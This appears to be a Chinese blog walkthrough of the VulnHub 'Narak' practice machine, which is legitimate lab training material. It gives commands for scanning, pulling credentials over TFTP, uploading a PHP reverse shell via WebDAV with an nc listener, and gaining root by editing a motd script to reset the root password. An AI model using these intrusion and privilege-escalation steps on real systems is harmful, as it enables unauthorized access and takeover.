vulnhub之narak的实践

admin 2023年1月30日19:29:20评论26 views字数 1195阅读3分59秒阅读模式

今天实践的是vulnhub的narak镜像,

下载地址,https://download.vulnhub.com/ha/narak.ova,

用workstation导入,做地址扫描,156就是靶机,

sudo netdiscover -r 192.168.58.0/24,

vulnhub之narak的实践

继续做端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.58.156,

vulnhub之narak的实践

有web服务,继续做目录爆破,sudo dirb http://192.168.58.156,

vulnhub之narak的实践

浏览器访问http://192.168.58.156/webdav,需要用户名密码,

vulnhub之narak的实践

目录文件爆破,sudo dirb http://192.168.58.156/ -X .txt,

vulnhub之narak的实践

浏览器访问http://192.168.58.156/tips.txt,提示creds.txt,

vulnhub之narak的实践

UDP服务端口扫描,sudo nmap -sU -p69 192.168.58.156,确认有tftp,

vulnhub之narak的实践

访问tftp,tftp 192.168.58.156,

获取文件,get creds.txt,

从文件中获取到base64编码的内容,

解密echo "eWFtZG9vdDpTd2FyZw==" | base64 -d,

获取到用户名密码明文,yamdoot:Swarg,

vulnhub之narak的实践

重新浏览器访问http://192.168.58.156/webdav,

vulnhub之narak的实践

用kali攻击机上自带的web shell,

cp /usr/share/webshells/php/php-reverse-shell.php ./shell.php,

编辑一下,vim shell.php,

vulnhub之narak的实践

用cadaver连接,cadaver http://192.168.58.156/webdav,

上传web shell文件,put shell.php,

vulnhub之narak的实践

确认一下,

vulnhub之narak的实践

kali攻击机上开个反弹shell监听,nc -lvp 4444,

浏览器访问web shell文件,获取到反弹shell,

转成交互式shell,python3 -c 'import pty;pty.spawn("/bin/bash")',

不是root,需要提权,

查找sudo权限的程序,find / -type f -perm -ug=rwx 2>/dev/null,

vulnhub之narak的实践

查看/mnt/hell.sh,cat /mnt/hell.sh,内容是brainfuck加密的,

vulnhub之narak的实践

在线解密,获取到密码chitragupt,

vulnhub之narak的实践

试了一下,是inferno用户的密码,

vulnhub之narak的实践

ssh登录,ssh [email protected]

vulnhub之narak的实践

还不是root,继续提权,

利用motd,编辑/etc/update-motd.d/00-header,

echo "echo 'root:admin'|sudo chpasswd">>00-header,

vulnhub之narak的实践

再次ssh登录,su -切到root,id确认,

vulnhub之narak的实践


原文始发于微信公众号(云计算和网络安全技术实践):vulnhub之narak的实践

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年1月30日19:29:20
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   vulnhub之narak的实践http://cn-sec.com/archives/1381334.html

发表评论

匿名网友 填写信息